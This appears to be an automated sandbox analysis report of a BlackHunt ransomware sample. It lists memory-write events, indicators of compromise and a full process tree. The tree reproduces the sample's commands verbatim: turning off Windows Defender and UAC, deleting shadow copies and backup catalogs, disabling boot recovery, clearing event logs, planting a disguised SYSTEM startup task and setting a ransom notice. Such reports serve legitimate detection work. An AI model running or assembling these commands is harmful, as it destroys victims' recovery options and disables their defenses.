b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 109 PID 2644 wrote to memory of 1328 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 109 PID 2644 wrote to memory of 1368 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 108 PID 2644 wrote to memory of 1368 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 108 PID 2644 wrote to memory of 3780 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 107 PID 2644 wrote to memory of 3780 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 107 PID 4980 wrote to memory of 1684 4980 cmd.exe 151 PID 4980 wrote to memory of 1684 4980 cmd.exe 151 PID 2644 wrote to memory of 3596 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 114 PID 2644 wrote to memory of 3596 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 114 PID 2644 wrote to memory of 1740 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 121 PID 2644 wrote to memory of 1740 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 121 PID 2644 wrote to memory of 3620 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 118 PID 2644 wrote to memory of 3620 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 118 PID 2644 wrote to memory of 644 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 123 PID 2644 wrote to memory of 644 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 123 PID 2644 wrote to memory of 3996 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 124 PID 2644 wrote to memory of 3996 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 124 PID 2644 wrote to memory of 848 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 126 PID 2644 wrote to memory of 848 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 126 PID 2644 wrote to memory of 1356 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 128 PID 2644 wrote to memory of 1356 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 128 PID 2644 wrote to memory of 2164 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 182 PID 2644 wrote to memory of 2164 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 182 PID 2644 wrote to memory of 2860 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 134 PID 2644 wrote to memory of 2860 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 134 PID 2644 wrote to memory of 4308 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 135 PID 2644 wrote to memory of 4308 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 135 PID 2644 wrote to memory of 3856 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 138 PID 2644 wrote to memory of 3856 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 138 PID 2644 wrote to memory of 1764 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 139 PID 2644 wrote to memory of 1764 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 139 PID 2644 wrote to memory of 3568 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 2644 wrote to memory of 3568 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 141 PID 2644 wrote to memory of 3068 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 153 PID 2644 wrote to memory of 3068 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 153 PID 4056 wrote to memory of 4896 4056 cmd.exe 152 PID 4056 wrote to memory of 4896 4056 cmd.exe 152 PID 2644 wrote to memory of 2316 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 143 PID 2644 wrote to memory of 2316 2644 b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe 143 PID 3004 wrote to memory of 3364 3004 cmd.exe 144 PID 3004 wrote to memory of 3364 3004 cmd.exe 144 PID 3328 wrote to memory of 3096 3328 cmd.exe 146 PID 3328 wrote to memory of 3096 3328 cmd.exe 146 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2644 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4056 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4896
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:3364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2908
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3892
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:1352
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:5260
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3328 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:648
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:8588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:4692
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:5416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:5252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:3780
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:7736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:1368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:6204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:1328
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:6176
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:5060
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:5196
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:3596
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:9524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:3620
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:6136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1740
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:9564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:644
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:9692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3996
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:6104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:848
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:6084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1356
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:9448
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4980
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:2860
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:5352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:4308
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:8076
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:3856
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:6404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:1764
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:6972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:8172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:2316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:8728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe" /F2⤵PID:2000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Modifies registry class
PID:1684
-
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe" /F3⤵
- Creates scheduled task(s)
PID:7468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:2748
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:6692
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3068
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:3956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:5204
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:6736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:5320
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3932
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5364
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:10116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:5428
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:8856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5540
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:8836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:5576
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:5376
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:7228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:5288
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:7000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:5220
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:8572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:5136
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:8736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:2164
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:6508
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:8404
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:8204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:12284
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:10968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:11860
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:10840
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:12392
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2604
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:11180
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:9864
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:12676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:11184
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:11068
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:13080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:964
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:10140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:7868
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:6020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:12724
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:13068
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:13464
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:13052
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:12560
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:14384
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:11924 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:7976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7976 -s 14444⤵
- Program crash
PID:8956
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\b329d12f84e7d6a7117a1cd6984acc8cc8f728c5e3787466aa8dbd984453e98c.exe"2⤵PID:13880
-
